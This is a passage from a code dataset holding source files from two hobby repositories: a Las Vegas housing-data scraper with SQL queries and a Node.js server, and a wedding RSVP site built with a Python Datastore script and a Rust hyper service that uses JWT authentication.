0.6354916095733643, "avg_line_length": 23.544116973876953, "blob_id": "470c68edeea9923010ed57feeb5977dff270a11a", "content_id": "88169f43143dee02ee45b5ee52452163674e9334", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 74, "num_lines": 68, "path": "/data_scrapping/db_calc/queries/sql_queries/monthly.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "-- Table is created displaying the max and min based on the previous month\n-- duplicates needs to be cleared\ndrop table if exists month{};\ncreate table month{0} (\n\twith monthly as (\n\t\tselect * from main\n\t\twhere \n\t\t\tdate > subdate(curdate(), interval {0} month)\n\t),\n amax as ( \n\t\tselect m1.date, m1.address, m1.location, max(m1.price) as price\n\t\tfrom monthly m1, monthly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = max(m2.price)\n\t),\n amin as (\n\t\tselect m1.date, m1.address, m1.location, min(m1.price) as price\n\t\tfrom monthly m1, monthly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = min(m2.price)\n\t),\n month1 as ( \n select * from amax \n union all\n select * from amin\n )\n-- remove duplicates\n select m1.date, m1.address, m1.location, m1.price\n\tfrom month1 m1, month1 m2\n\twhere\n m1.address = m2.address and\n\tm1.location = m2.location and\n m1.price != m2.price\n);\n-- insert most recent price of addresses listed above\n-- insert into month1 (\n-- \twith monthlly as (\n-- \t\t\tselect date, address, price\n-- \t\t\tfrom main\n-- \t\t\twhere date > subdate(curdate(), interval 1 month)\n-- \t\t)\n\n-- \t\tselect m1.date, m1.address, m1.price\n-- \t\tfrom monthlly m1, monthlly m2\n-- \t\twhere \n-- \t\t\tm1.address = m2.address and\n-- \t\t\tm1.date = m2.date and\n-- \t\t\tm1.price = m2.price\n-- \t\tgroup by \n-- \t\t\tm1.address\n-- \t\thaving \n-- \t\t\tm1.date = max(m2.date) and\n-- \t\t\t(m1.date, m1.address) in (\n-- \t\t\t\tselect date, address \n-- \t\t\t\tfrom month1\n-- \t\t\t\tgroup by address\n-- \t\t\t)\n-- )" }, { "alpha_fraction": 0.42424243688583374, "alphanum_fraction": 0.5151515007019043, "avg_line_length": 20.33333396911621, "blob_id": "e623ce09d895baa187d3f351d6194dd9cc2a6f03", "content_id": "43d0cb2671f93236e828f429dbd49923b860d2e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 132, "license_type": "permissive", "max_line_length": 36, "num_lines": 6, "path": "/node_server/controller/404.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\n\nexports.error = (req, res, next)=> {\n res.status(404).render('404',\n {pageTitle: '404'},\n console.log('404')\n );\n};\n\n\n" }, { "alpha_fraction": 0.4981149733066559, "alphanum_fraction": 0.5009425282478333, "avg_line_length": 28.47222137451172, "blob_id": "830e8410c5eb60e18de84a36c5fe75e86f14f3c6", "content_id": "bdd5259c49ed7d515a5bc34ccbea33c7c612111f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2122, "license_type": "permissive", "max_line_length": 105, "num_lines": 72, "path": "/data_scrapping/zillow_mine/spiders/bs4_json.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nfrom datetime import date, timedelta\nfrom zillow_mine.spiders.to_db import db_parse\n\n\nclass bsj:\n\n\n def __init__(self, page_source = []):\n self.page_source = page_source\n self.dic = []\n self.data = []\n\n\n def stripz(self, inn):\n return inn.strip('$').replace(',','')\n\n\n def num_test(self, numb):\n numbz = numb.replace('.','').strip('$')\n if numbz.isnumeric():\n return numb\n else:\n return None\n\n\n def extract(self):\n\n self.dic = []\n soup = BeautifulSoup(self.page_source, 'html.parser')\n divs = soup.find_all(\"tr\", {\"class\":\"tableRow\"})\n\n for sub in divs:\n \n try:\n address = sub.find('a', {'class':'address'}).get_text()\n location = sub.find('div', {'class':'location'}).get_text()\n price = self.stripz(sub.find('td', {'class':'column column_3 col_price'}).get_text())\n price = self.num_test(price)\n beds = sub.find('td', {'class':'column column_4 col_beds'}).get_text()\n beds = self.num_test(beds)\n baths = sub.find('td', {'column column_5 col_baths'}).get_text()\n baths = self.num_test(baths)\n sqft = self.stripz(sub.find('td', {'class':'column column_6 col_sqft'}).get_text())\n sqft = self.num_test(sqft)\n per_sqft = self.stripz(sub.find('td', {'class':'column column_7 col_ppsqft'}).get_text())\n per_sqft = self.num_test(per_sqft)\n\n if (address is None) | (price is None):\n pass\n else:\n self.dic = [str(date.today()), address, location, price, beds, baths, sqft, per_sqft]\n self.data.append(self.dic)\n \n except:\n pass\n\n\n def parse_db(self):\n inser = db_parse(data = self.data)\n inser.initiate()\n\n\n def initate(self):\n self.extract()\n self.parse_db()\n\n\nif __name__ == '__main__':\n x = bsj()\n x.extract()\n x.parse_db()\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 18.22222137451172, "blob_id": "90fd17362655959f5d65a6b1fbc606e833fef8a1", "content_id": "ee49d49b82f5e4018f714cdfedf88a41fb361260", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 175, "license_type": "permissive", "max_line_length": 44, "num_lines": 9, "path": "/node_server/routes/front.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst express = require('express');\n\nconst front = require('../controller/front')\n\nconst router = express.Router();\n\nrouter.get('/', front.front);\n\nmodule.exports = router;\n\n" }, { "alpha_fraction": 0.6348039507865906, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 20.473684310913086, "blob_id": "b619ddf56c3ea43fef3bf8cc5a7999e5a151167d", "content_id": "91bbca15e85c16d2d8fe50f3ec87d51f080b7210", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "permissive", "max_line_length": 70, "num_lines": 19, "path": "/setup.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom setuptools import setup, find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='zill',\n version='0.1.0',\n description='Deplyoment of scraping Redfin and Node.js webserver',\n long_description=readme,\n author='Alan Tam',\n author_email='[email protected]',\n url='https://github.com/AlanK27/zill',\n license=license\n)" }, { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 27.33333396911621, "blob_id": "7704f89c2e12206b3ebebad672d6fad182551f1c", "content_id": "6ed2a476907bf4e9c0f6ca9709929c5ab6b80c2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 86, "license_type": "permissive", "max_line_length": 42, "num_lines": 3, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/operation.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\ndelete from yesterday;\nINSERT INTO yesterday SELECT * FROM today;\ndelete from today;\n" }, { "alpha_fraction": 0.7983706593513489, "alphanum_fraction": 0.7983706593513489, "avg_line_length": 43.54545593261719, "blob_id": "ba0fb94c44edc3a75b00bf698d26a615da8d80c3", "content_id": "4db3187aaa86a866685611f137bba8eb16f7c458", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 491, "license_type": "permissive", "max_line_length": 90, "num_lines": 11, "path": "/README.md", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\n# Vegas Housing Data\n\nThis project data mines housing information on zillow in the surrounding Las Vegas market.\nDue to certain restrictions on zillow's own website selenium library is used in addition\nto scrapy to draw the data. \n\nMined data is contained in mysql database and viewed on webserver. The server will handle\ninformation and update on the price changes on a weekly and monthly bases.\n\n### *Note*\nMake sure the chromedriver is the correct version and in directory mine/driver/.\n" } ]
20
sillyproject/codingchallengenov
https://github.com/sillyproject/codingchallengenov
5b006b4f33d62a044929caa154af46624afe584c
fe39cdf347ce4a66ca76f555b3c7fed257daca63
b55828c13921c3cd6ee6b81d089c06a41c68d698
refs/heads/master
2018-01-11T03:21:03.745229
2015-11-06T22:46:58
2015-11-06T22:46:58
45,664,919
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7050740122795105, "alphanum_fraction": 0.7230443954467773, "avg_line_length": 48.68421173095703, "blob_id": "20e2ad0ba6d521f5c85e7d30181fb325ab0b116e", "content_id": "0c5a613655eec75f24a769c763bdcda46acedff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 946, "license_type": "no_license", "max_line_length": 149, "num_lines": 19, "path": "/README.md", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "Insight Data Engineering - Coding Challenge\n===========================================================\nDate: Nov 5, 2015\n\nProgram used in this Coding Challenge: Python 2.7.10, MacOS Lion 10.7.5\nExternal Library: Networkx (https://networkx.github.io/documentation/latest/install.html)\n\n\n\n## Challenge Summary\n\nThis challenge is to implement two features:\n\n1. Clean and extract the text from the raw JSON tweets that come from the Twitter Streaming API, and track the number of tweets that contain unicode.\n2. Calculate the average degree of a vertex in a Twitter hashtag graph for the last 60 seconds, and update this each time a new tweet appears.\n\nHere, we have to define a few concepts:\n- A tweet's text is considered \"clean\" once all of the escape characters (e.g. \\n, \\\", \\/ ) are replaced and unicode have been removed.\n- A Twitter hashtag graph is a graph connecting all the hashtags that have been mentioned together in a single tweet.\n\n\n" }, { "alpha_fraction": 0.6367131471633911, "alphanum_fraction": 0.652570903301239, "avg_line_length": 30.530303955078125, "blob_id": "225fbe3a103608204e3597b2f97c16280d91d5ef", "content_id": "944df9e493e1e01d11d724bb79e407b700c1f29b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2081, "license_type": "no_license", "max_line_length": 137, "num_lines": 66, "path": "/src/average_degree.py", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "# example of program that calculates the average degree of hashtags\n\nimport os.path\nimport time\nimport networkx as nx\nimport datetime\nfrom datetime import datetime\nfrom datetime import timedelta\nimport re\n\n\nstart_time = time.time()\n\ndef extract_hashtags(s):\n t = s.lower\n return set(part for part in t.split() if part.startswith('#'))\n\ndef extract_timestamp(s):\n match = re.search(r'\\d{2}:\\d{2}:\\d{2}', s)\n return match.group() \n\n# assume using output from tweets_cleaned to make process faster\ndata = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_input/tweetsclean.txt\")\ntweets = data.readlines()\nnum_lines = sum(1 for line in tweets)\n\nft2 = os.path.join(\"/Users/sibog/Desktop/codingchallengenov/tweet_output/ft2.txt\")\nfile2 = open(ft2, 'w')\n\n# check which tweets were in last 60 seconds (from the bottom of the list to top)\ncount=0\ntdelta=timedelta(0,0)\nwhile tdelta < timedelta(seconds=60):\n t0 = datetime.strptime(extract_timestamp(tweets[num_lines-2-count]),'%H:%M:%S')\n t1 = datetime.strptime(extract_timestamp(tweets[num_lines-1]), '%H:%M:%S')\n tdelta = t1-t0\n count += 1\ncorrected_num_lines = num_lines-count\n\nn = corrected_num_lines\ng = nx.Graph()\nfor n in range(n, num_lines):\n \n hashtags = set(i for i in tweets[n].lower().split() if i.startswith('#')) #make hashtags all lowercase to count for any duplicates \n hashtags = list(hashtags)\n\n num_hashtags = sum(1 for line in hashtags)\n\n #connect all hashtags within one tweets\n if num_hashtags > 1:\n i = 0\n for i in range (i, num_hashtags):\n if i == 0:\n g.add_edge(hashtags[0], hashtags[num_hashtags-1])\n elif 0 < i < num_hashtags:\n g.add_edge(hashtags[i], hashtags[i-1])\n\n\nsequence = g.degree().values()\navg_degree = sum(sequence)/float(len(sequence))\n\nprint >>file2, round(avg_degree,2) #rounded to the nearest hundredths place\n\nfile2.close()\n\n#print(\"--- %s seconds ---\" % (time.time() - start_time)) #time used to run this program\n" }, { "alpha_fraction": 0.6147540807723999, "alphanum_fraction": 0.631147563457489, "avg_line_length": 32.272727966308594, "blob_id": "17940a7f2ac1d0469afbd07c40b314d9e4a35014", "content_id": "0a222b9f39b96cbe2c62b255a5648754230c734d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "no_license", "max_line_length": 106, "num_lines": 33, "path": "/src/tweets_cleaned.py", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "# example of program that calculates the number of tweets cleaned\n# Author: Sibo Gao\n# Date: Nov 5, 2015\n\nimport os.path\nimport time\nstart_time = time.time()\n\n#configure the input files assuming in the following directory:\ndata = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_input/tweets.txt\")\ntweets = data.readlines()\nnum_lines = sum(1 for line in tweets)\nfile1 = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_output/ft1.txt\", 'w')\n\nn = 0\ncount = 0\nfor n in range(n, num_lines):\n \n textraw = tweets[n].split(',\"text\":\"')[1].split('\",\"source\"')[0] \n timestamp = tweets[n].split('\"created_at\":\"')[1].split('\",\"id\"')[0]\n text = textraw.decode('unicode_escape').encode('ascii','ignore')\n if text != textraw:\n count = count + 1\n else:\n count = count\n print >>file1, text + \" (timestamp: \" + timestamp + \")\"\n\n\nprint >>file1, \"\\n\" + \"{} {}\".format(count, \"tweets contained unicode.\") #concatenate integer and string \n\nfile1.close()\n\n#print(\"--- %s seconds ---\" % (time.time() - start_time)) #time used to run this program\n" } ]
3
jvandew/wwww
https://github.com/jvandew/wwww
dd8e5a41e65c462a0f97d0059d291bb5d8a728b5
ac04e780541be960e2e5011969a922d0a22afd51
8f8e2da05878feb1de9f0fc7e3e65b258088caa3
refs/heads/master
2021-06-23T16:00:35.796716
2019-04-25T04:03:09
2019-04-25T04:03:09
115,649,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6182648539543152, "alphanum_fraction": 0.6219177842140198, "avg_line_length": 26.375, "blob_id": "6726b181aabab66cf20d9a2eabe497a8f7c21ba4", "content_id": "7d7ace9d9d9d7d0bd2bfd2c7f2045a39171ae4da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 75, "num_lines": 40, "path": "/scripts/create_rsvp.py", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "from google.cloud import datastore\n\n\ndef main():\n datastore_client = datastore.Client()\n partial_key = datastore_client.key('rsvp')\n\n saved_count = 0\n print('enter rsvp data, \\'done\\' to quit on invited count or first name')\n\n invited_count_input = input('invited count: ').lower()\n while invited_count_input != 'done':\n invited_count = int(invited_count_input)\n invited = []\n\n first_name = input('first name: ').lower()\n while first_name != 'done':\n last_name = input('last name: ').lower()\n invited.append({\n 'first_name': first_name,\n 'last_name': last_name,\n })\n first_name = input('first name: ').lower()\n\n key = datastore_client.allocate_ids(partial_key, 1)[0]\n rsvp = datastore.Entity(\n key=key,\n exclude_from_indexes=['invited_count'],\n )\n rsvp['invited'] = invited\n rsvp['invited_count'] = invited_count\n datastore_client.put(rsvp)\n saved_count += 1\n\n invited_count_input = input('invited_count: ').lower()\n\n print('created {} rsvp entries'.format(saved_count))\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6672991514205933, "alphanum_fraction": 0.6723592877388, "avg_line_length": 30.6200008392334, "blob_id": "20c40287586324d2537722a569fd7c45017d7866", "content_id": "64fffa337995e231db84c81c98b6b69f8dc24995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3162, "license_type": "no_license", "max_line_length": 95, "num_lines": 100, "path": "/src/main.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "extern crate bytes;\nextern crate futures;\nextern crate hyper;\nextern crate hyper_tls;\nextern crate itertools;\nextern crate jsonwebtoken;\nextern crate regex;\nextern crate tokio_core;\nextern crate url;\n\n#[macro_use]\nextern crate serde_derive;\n\n#[macro_use]\nextern crate serde_json;\n\nuse futures::Future;\nuse futures::future;\nuse futures::stream::Stream;\nuse hyper::Client;\nuse hyper::server::Http;\nuse hyper_tls::HttpsConnector;\nuse std::fs::{self, File};\nuse std::net::{IpAddr, Ipv4Addr, SocketAddr};\nuse std::str;\nuse tokio_core::reactor::Core;\n\nmod datastore;\nmod model;\nmod service;\n\nuse service::RsvpService;\n\n#[derive(Clone, Deserialize, Serialize)]\nstruct AccountDetails {\n project_id: String,\n private_key_id: String,\n client_email: String,\n}\n\n#[derive(Clone)]\npub struct AccountData {\n details: AccountDetails,\n private_key: Vec<u8>,\n public_key: Vec<u8>,\n}\n\n#[derive(Clone, Deserialize, Serialize)]\npub struct RsvpCredentials {\n admin: String,\n user: String,\n}\n\nfn main() {\n let account_file = File::open(\"keys/application-datastore-user.json\")\n .expect(\"failed to open account details file\");\n let account_details = serde_json::from_reader(account_file)\n .expect(\"failed to parse account details\");\n let account_private_key = fs::read(\"keys/private_rsa_key.der\")\n .expect(\"Failed to read account private key\");\n let account_public_key = fs::read(\"keys/public_rsa_key.der\")\n .expect(\"Failed to read account public key\");\n let account_data = AccountData {\n details: account_details,\n private_key: account_private_key,\n public_key: account_public_key,\n };\n\n let rsvp_credentials_file = File::open(\"keys/rsvp_credentials.json\")\n .expect(\"failed to open rsvp credentials file\");\n let rsvp_credentials: RsvpCredentials = serde_json::from_reader(rsvp_credentials_file)\n .expect(\"failed to parse rsvp credentials\");\n\n let mut event_loop = Core::new().expect(\"unable to create event loop\");\n let event_loop_handle = event_loop.handle();\n let https = HttpsConnector::new(2, &event_loop_handle).expect(\"TLS initialization failed\");\n let client = Client::configure().connector(https).build(&event_loop_handle);\n\n let socket_addr = SocketAddr::new(\n IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1)),\n 8080,\n );\n\n let service = RsvpService::new(client, account_data, rsvp_credentials);\n let server = Http::new()\n .serve_addr_handle(&socket_addr, &event_loop_handle, move || Ok(service.clone()))\n .expect(\"unable to bind http server\");\n let inner_event_loop_handle = event_loop_handle.clone();\n\n println!(\"running...\");\n let connection_handle_future = server.for_each(move |connection| {\n let connection_future = connection\n .map(|_| ())\n .map_err(|error| eprintln!(\"server error: {}\", error));\n inner_event_loop_handle.spawn(connection_future);\n Ok(())\n }).map_err(|error| eprintln!(\"server spawn error: {}\", error));\n event_loop_handle.spawn(connection_handle_future);\n event_loop.run(future::empty::<(),()>()).expect(\"failed to start event loop\");\n}\n" }, { "alpha_fraction": 0.4416983127593994, "alphanum_fraction": 0.4440501630306244, "avg_line_length": 39.324459075927734, "blob_id": "dea8fd82cd51af73b4c694afcda2844484ec114f", "content_id": "18329f7d0aabf67c032e32fcc98f5a4d2e6625a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 24236, "license_type": "no_license", "max_line_length": 104, "num_lines": 601, "path": "/src/service/mod.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use bytes::Bytes;\nuse futures::Future;\nuse futures::future;\nuse futures::stream::Stream;\nuse hyper::{Body, Client, Method, StatusCode, Uri};\nuse hyper::{Error as HyperError};\nuse hyper::client::{self, HttpConnector};\nuse hyper::header::{self, Accept, Authorization, Bearer, ContentType};\nuse hyper::mime::APPLICATION_JSON;\nuse hyper::server::{self, Service};\nuse hyper_tls::HttpsConnector;\nuse itertools;\nuse jsonwebtoken::{self, Algorithm, Header};\nuse serde_json::{self, Value};\nuse std::collections::HashMap;\nuse std::io::Read;\nuse std::iter::FromIterator;\nuse std::fs::File;\nuse std::io::BufReader;\nuse std::str;\nuse std::time::{SystemTime, UNIX_EPOCH};\nuse url::form_urlencoded;\n\npub mod form;\n\nuse {AccountData, RsvpCredentials};\nuse datastore::client::{CommitResult, RsvpQueryResult};\nuse model::Rsvp;\n\nstatic DATASTORE_API: &'static str = \"google.datastore.v1.Datastore\";\nstatic DATASTORE_HOST: &'static str = \"https://datastore.googleapis.com\";\n\ntype ResponseFuture = Box<Future<Item = server::Response<Body>, Error = HyperError>>;\n\n// TODO(jacob): convert all Strings to &str\n#[derive(Deserialize, Serialize)]\nstruct Claims {\n iss: String,\n sub: String,\n aud: String,\n iat: u64,\n exp: u64,\n}\n\n#[derive(Debug)]\nstruct LoginData {\n first_name: String,\n last_name: String,\n password: String,\n}\n\nimpl LoginData {\n fn from_form_data(form_data: &[u8]) -> Option<LoginData> {\n let params = form_urlencoded::parse(form_data).collect::<HashMap<_, _>>();\n let first_name = params.get(\"first_name\")?;\n let last_name = params.get(\"last_name\")?;\n let password = params.get(\"password\")?;\n\n let login_data = LoginData {\n first_name: first_name.to_string(),\n last_name: last_name.to_string(),\n password: password.to_string(),\n };\n Some(login_data)\n }\n}\n\n#[derive(Clone)]\npub struct RsvpService {\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n account_data: AccountData,\n rsvp_credentials: RsvpCredentials,\n}\n\nimpl RsvpService {\n pub fn new(\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n account_data: AccountData,\n rsvp_credentials: RsvpCredentials,\n ) -> RsvpService {\n RsvpService {\n datastore_client: datastore_client,\n account_data: account_data,\n rsvp_credentials: rsvp_credentials,\n }\n }\n\n fn get_datastore_token(account_data: &AccountData) -> String {\n let time = SystemTime::now()\n .duration_since(UNIX_EPOCH)\n .expect(\"Error getting unix timestamp\")\n .as_secs();\n\n let mut jwt_header = Header::default();\n jwt_header.alg = Algorithm::RS256;\n jwt_header.kid = Some(account_data.details.private_key_id.clone());\n jwt_header.typ = Some(\"JWT\".to_string());\n\n let claims = Claims {\n iss: account_data.details.client_email.clone(),\n sub: account_data.details.client_email.clone(),\n aud: format!(\"{}/{}\", DATASTORE_HOST, DATASTORE_API),\n iat: time,\n exp: time + 3600,\n };\n\n jsonwebtoken::encode(&jwt_header, &claims, &account_data.private_key)\n .expect(\"Error encoding json web token\")\n }\n\n fn build_datastore_request(\n account_data: &AccountData,\n endpoint: &str,\n request_json: String,\n ) -> client::Request<Body> {\n let uri = format!(\n \"{}/v1/projects/{}:{}\",\n DATASTORE_HOST,\n account_data.details.project_id,\n endpoint,\n ).parse().expect(\"Unable to parse query uri\");\n\n let token = RsvpService::get_datastore_token(account_data);\n\n let mut request = client::Request::new(Method::Post, uri);\n request.headers_mut().set(Accept(vec![header::qitem(APPLICATION_JSON)]));\n request.headers_mut().set(Authorization(Bearer { token: token }));\n request.headers_mut().set(ContentType(APPLICATION_JSON));\n request.set_body(Body::from(request_json));\n request\n }\n\n fn build_commit_request(\n account_data: &AccountData,\n transaction_id: &str,\n rsvp: Rsvp,\n ) -> client::Request<Body> {\n let commit_request = json!({\n \"mode\": \"TRANSACTIONAL\",\n \"mutations\": [\n {\n \"update\": rsvp.to_json(),\n },\n ],\n \"transaction\": transaction_id,\n }).to_string();\n RsvpService::build_datastore_request(\n account_data,\n \"commit\",\n commit_request,\n )\n }\n\n fn build_query_request(\n account_data: &AccountData,\n first_name: &str,\n last_name: &str,\n ) -> client::Request<Body> {\n let query_request = json!({\n \"query\": {\n \"filter\": {\n \"compositeFilter\": {\n \"op\": \"AND\",\n \"filters\": [\n {\n \"propertyFilter\": {\n \"property\": {\n \"name\": \"invited.first_name\",\n },\n \"op\": \"EQUAL\",\n \"value\": {\n \"stringValue\": first_name.to_lowercase(),\n },\n },\n },\n {\n \"propertyFilter\": {\n \"property\": {\n \"name\": \"invited.last_name\",\n },\n \"op\": \"EQUAL\",\n \"value\": {\n \"stringValue\": last_name.to_lowercase(),\n },\n },\n },\n ],\n },\n },\n \"kind\": [\n {\n \"name\": \"rsvp\",\n },\n ],\n },\n }).to_string();\n RsvpService::build_datastore_request(account_data, \"runQuery\", query_request)\n }\n\n fn build_transaction_request(account_data: &AccountData) -> client::Request<Body> {\n let transaction_request = json!({\n \"transactionOptions\": {\n \"readWrite\": {\n }\n }\n }).to_string();\n RsvpService::build_datastore_request(\n account_data,\n \"beginTransaction\",\n transaction_request,\n )\n }\n\n fn failed_login(status_code: StatusCode, reason: String) -> ResponseFuture {\n let file = File::open(format!(\"www/rsvp.html\"))\n .expect(\"failed to open login form file\");\n let mut buf_reader = BufReader::new(file);\n let mut template = String::new();\n buf_reader.read_to_string(&mut template)\n .expect(\"failed to read login form file\");\n let rendered = template.replace(\"<!--$login_error-->\", &reason);\n let response = server::Response::new()\n .with_status(status_code)\n .with_body(Body::from(rendered));\n Box::new(future::ok(response))\n }\n\n // TODO(jacob): This should be a method on self.\n fn handle_login(\n account_data: AccountData,\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n rsvp_credentials: RsvpCredentials,\n data: &[u8],\n ) -> Option<ResponseFuture> {\n let login_data = LoginData::from_form_data(data)?;\n println!(\"login attempt: {:?}\", login_data);\n\n if login_data.password != rsvp_credentials.user {\n let response_future = RsvpService::failed_login(\n StatusCode::Unauthorized,\n \"Invalid login, please try again.\".to_string(),\n );\n Some(response_future)\n\n } else {\n let request = RsvpService::build_query_request(\n &account_data,\n &login_data.first_name,\n &login_data.last_name,\n );\n\n let response_future = datastore_client.request(request).and_then(move |response| {\n response.body().concat2().and_then(move |raw_query_result| {\n let query_result_string = str::from_utf8(&raw_query_result)\n .expect(\"unable to parse database rsvp entry\");\n let query_result_json = serde_json::from_str(query_result_string)\n .expect(\"unable to parse database rsvp json\");\n\n match RsvpQueryResult::from_json(&query_result_json) {\n RsvpQueryResult::NotFound => RsvpService::failed_login(\n StatusCode::NotFound,\n \"Guest not found, please try again.\".to_string(),\n ),\n\n RsvpQueryResult::Multiple(rsvps) => {\n println!(\n \"multiple rsvp entries found for {}, {}: {:?}\",\n login_data.last_name,\n login_data.first_name,\n rsvps,\n );\n RsvpService::failed_login(\n StatusCode::InternalServerError,\n \"Multiple guest entries found, please contact Jacob.\".to_string(),\n )\n },\n\n RsvpQueryResult::Single(rsvp) => RsvpService::render_form(\n &account_data,\n rsvp,\n None,\n StatusCode::Ok,\n ),\n }\n })\n });\n Some(Box::new(response_future))\n }\n }\n\n fn handle_static(uri: Uri) -> ResponseFuture {\n let path = {\n if uri.path().ends_with(\"/\") {\n format!(\"{}index.html\", uri.path())\n } else {\n uri.path().to_string()\n }\n };\n let response = File::open(format!(\"www{}\", path)).ok().map_or_else(\n || server::Response::new()\n .with_status(StatusCode::NotFound)\n .with_body(\"Not Found\"),\n |file| {\n let bytes = Bytes::from_iter(itertools::flatten(file.bytes()));\n server::Response::new()\n .with_body(Body::from(bytes))\n },\n );\n Box::new(future::ok(response))\n }\n\n // TODO(jacob): This should be a method on self.\n fn handle_submission<'a>(\n account_data: AccountData,\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n data: &[u8],\n ) -> Option<ResponseFuture> {\n // TODO(jacob): There are a bunch of clones in this function. They would seem to\n // be removable by just having the closures borrow their values instead of\n // taking ownership, but that may not be possible due to the static lifetime\n // of the futures these closures are operating over. If it isn't possible,\n // we should just have Rsvp implement Copy so this happens automatically.\n let account_data1 = account_data.clone();\n let account_data2 = account_data.clone();\n let account_data3 = account_data.clone();\n let rsvp1 = Rsvp::from_form_data(&account_data, data)?;\n let rsvp2 = rsvp1.clone();\n let rsvp3 = rsvp1.clone();\n let rsvp4 = rsvp1.clone();\n let transaction_request = RsvpService::build_transaction_request(&account_data);\n\n let response_future = datastore_client.request(transaction_request)\n .and_then(move |transaction_response| {\n transaction_response.body().concat2().and_then(move |raw_result| {\n let transaction_string = str::from_utf8(&raw_result)\n .expect(\"unable to parse transaction response\");\n let transaction_json = serde_json::from_str::<Value>(transaction_string)\n .expect(\"unable to parse transaction json\");\n\n transaction_json[\"transaction\"].as_str().map_or_else(\n || {\n let message = RsvpService::render_message(\n \"Error saving rsvp, please try again later and contact \\\n Jacob if this error persists.\",\n true,\n );\n RsvpService::render_form(\n &account_data,\n rsvp1,\n Some(&message),\n StatusCode::InternalServerError,\n )\n },\n\n |transaction_id| {\n let commit_request = RsvpService::build_commit_request(\n &account_data1,\n transaction_id,\n rsvp2,\n );\n let response_future = datastore_client.request(commit_request)\n .and_then(move |commit_response| {\n commit_response.body().concat2().and_then(move |raw_commit_result| {\n let commit_string = str::from_utf8(&raw_commit_result)\n .expect(\"unable to parse commit response\");\n let commit_json = serde_json::from_str::<Value>(commit_string)\n .expect(\"unable to parse commit json\");\n\n CommitResult::from_json(&commit_json).map_or_else(\n || {\n let message = RsvpService::render_message(\n \"Error saving rsvp, please try again later \\\n and contact Jacob if this error persists.\",\n true,\n );\n RsvpService::render_form(\n &account_data2,\n rsvp3,\n Some(&message),\n StatusCode::InternalServerError,\n )\n },\n\n |commit_result| {\n println!(\n \"successfully saved rsvp with result: {:?}\",\n commit_result,\n );\n let message = RsvpService::render_message(\n \"Rsvp saved successfully!\",\n false,\n );\n RsvpService::render_form(\n &account_data3,\n rsvp4,\n Some(&message),\n StatusCode::Ok,\n )\n },\n )\n })\n });\n Box::new(response_future)\n },\n )\n })\n });\n Some(Box::new(response_future))\n }\n\n fn get_auth_token(\n account_data: &AccountData,\n rsvp: &Rsvp,\n ) -> String {\n let empty_rsvp_json = match rsvp {\n empty @ Rsvp::Empty { .. } => empty.to_json(),\n Rsvp::Full {\n key,\n attending: _,\n email: _,\n going: _,\n invited,\n other_notes: _,\n invited_count,\n } => {\n let empty = Rsvp::Empty {\n key: key.clone(),\n invited: invited.to_vec(),\n invited_count: *invited_count,\n };\n empty.to_json()\n }\n };\n\n let mut header = Header::default();\n header.alg = Algorithm::RS256;\n jsonwebtoken::encode(&header, &empty_rsvp_json, 